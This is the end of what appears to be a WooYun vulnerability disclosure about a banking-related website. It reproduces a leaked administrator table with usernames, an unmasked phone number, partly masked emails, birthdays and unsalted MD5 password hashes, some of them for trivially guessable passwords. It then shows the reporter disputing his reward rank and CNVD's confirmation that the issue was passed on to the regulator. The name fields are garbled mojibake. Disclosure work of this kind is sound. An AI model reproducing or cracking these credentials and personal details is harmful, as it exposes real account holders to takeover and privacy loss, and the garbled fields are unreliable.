| id | type_id | duty | name | phone | email | remark | deption | wxphone | nxphone | username | birthday | PBCaller | password | confirmed | admin_role | confirm_man | latest_access_ip | latest_access_time |
+----+---------+--------------+------------+-------------+-------------------+---------+---------+---------+---------+-----------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| 1 | 1 | ?í????·????± | ???????í?± | 13523528780 | <blank> | <blank> | <blank> | <blank> | <blank> | administ | 1983-06-29 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 1 | administ | **.**.**.** | 2015-09-11 13:48:05 |
| 2 | 1 | <blank> | ???????§ | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | anonymous | 0000-00-00 | <blank> | 665dbdbbf44d88679510e0fe3c56b511 | 1 | <blank> | administ | **.**.**.** | 2013-01-28 14:49:49 |
| 4 | 1 | <blank> | ?????± | <blank> | xzls666@**.**.**.** | <blank> | <blank> | <blank> | <blank> | xzls666 | 0000-00-00 | <blank> | d05a8e6dd0c789c99861117bd71ba71e | 1 | 1 | administ | **.**.**.** | 2015-05-12 15:12:01 |
| 5 | 1 | <blank> | ?????????? | <blank> | grywb@vip.**.**.**.** | <blank> | <blank> | <blank> | <blank> | grywb | 1980-02-29 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | <blank> | administ | **.**.**.** | 2015-08-27 16:19:11 |
| 3 | 1 | <blank> | ×??????í?? | <blank> | [email protected] | <blank> | <blank> | <blank> | <blank> | zhglb | 0000-00-00 | <blank> | 8cd3fd02db1667e7d6a66ab9a01f6e5e | 1 | <blank> | zhglb | **.**.**.** | 2015-06-18 18:05:57 |
+----+---------+--------------+------------+-------------+-------------------+---------+---------+---------+---------+-----------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+


OK, all I want to say is: I did not dump the database. Is it reasonable not to give 20 rank?

Remediation:

You are the experts.

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-15 14:00

Vendor reply:

CNVD confirmed and reproduced the described issue and has passed it via CNCERT to the banking-industry IT regulator for notification, which will coordinate handling with the website's operating organization.

Latest status:

None yet